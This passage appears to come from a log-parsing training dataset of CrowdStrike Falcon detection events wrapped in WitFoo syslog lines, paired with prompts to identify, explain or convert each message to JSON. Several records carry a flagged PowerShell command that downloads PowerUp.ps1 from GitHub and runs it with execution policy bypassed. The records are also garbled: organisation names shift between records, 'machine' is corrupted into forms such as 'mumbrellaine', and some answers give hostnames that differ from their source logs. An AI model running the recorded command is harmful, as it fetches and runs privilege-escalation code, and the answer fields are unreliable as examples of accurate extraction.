Files\\\\portal\\\\6e657b17\\\\3c955147\\\\pqwjm4kv.cmdline\\\"\",\"parent_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770812509131\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mumbrellaine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=80.162.166.176 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-25T11:20:20Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "80.162.166.176", "userName": "nighthawk" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mumbrellaine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mumbrellaine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mumbrellaine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=80.162.166.176 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mumbrellaine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mumbrellaine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mumbrellaine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=80.162.166.176 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVISAASQATWEB01.devnvi.paygoint.com clientmac: 0accca51756b filehash: 1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 filename: VBCSCompiler.exe filepath: \Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-25T11:20:20Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 80.162.166.176 userName: nighthawk
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=174.74.207.62 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com", "clientmac": "0edeb6ae9241", "filehash": "N/A", "filename": "powershell.exe", "filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T16:44:43Z\",\"template_instance_id\":\"4712\",\"behavior_id\":\"10166\",\"filename\":\"powershell.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"scenario\":\"attacker_methodology\",\"objective\":\"Follow Through\",\"tactic\":\"Execution\",\"tactic_id\":\"TA0002\",\"technique\":\"PowerShell\",\"technique_id\":\"T1059.001\",\"display_name\":\"PShellDownloadRun\",\"description\":\"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"command_line\",\"ioc_value\":\"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks\",\"ioc_source\":\"interactive_script\",\"ioc_description\":\"\",\"user_name\":\"bob\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254\",\"sha256\":\"N/A\",\"md5\":\"N/A\",\"parent_details\":{\"parent_sha256\":\"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c\",\"parent_md5\":\"c6cd12bf63e9b9b4478e6f975e7c293d\",\"parent_cmdline\":\"C:\\\\Windows\\\\Explorer.EXE\",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=174.74.207.62 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-29T16:44:43Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "174.74.207.62", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=174.74.207.62 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=174.74.207.62 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com clientmac: 0edeb6ae9241 filehash: N/A filename: powershell.exe filepath: \Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-29T16:44:43Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 174.74.207.62 userName: bob
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=233.87.19.2 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com", "clientmac": "0edeb6ae9241", "filehash": "N/A", "filename": "powershell.exe", "filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T16:44:43Z\",\"template_instance_id\":\"4712\",\"behavior_id\":\"10166\",\"filename\":\"powershell.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"scenario\":\"attacker_methodology\",\"objective\":\"Follow Through\",\"tactic\":\"Execution\",\"tactic_id\":\"TA0002\",\"technique\":\"PowerShell\",\"technique_id\":\"T1059.001\",\"display_name\":\"PShellDownloadRun\",\"description\":\"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"command_line\",\"ioc_value\":\"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks\",\"ioc_source\":\"interactive_script\",\"ioc_description\":\"\",\"user_name\":\"bob\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254\",\"sha256\":\"N/A\",\"md5\":\"N/A\",\"parent_details\":{\"parent_sha256\":\"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c\",\"parent_md5\":\"c6cd12bf63e9b9b4478e6f975e7c293d\",\"parent_cmdline\":\"C:\\\\Windows\\\\Explorer.EXE\",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=233.87.19.2 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-08-29T16:44:43Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "233.87.19.2", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); 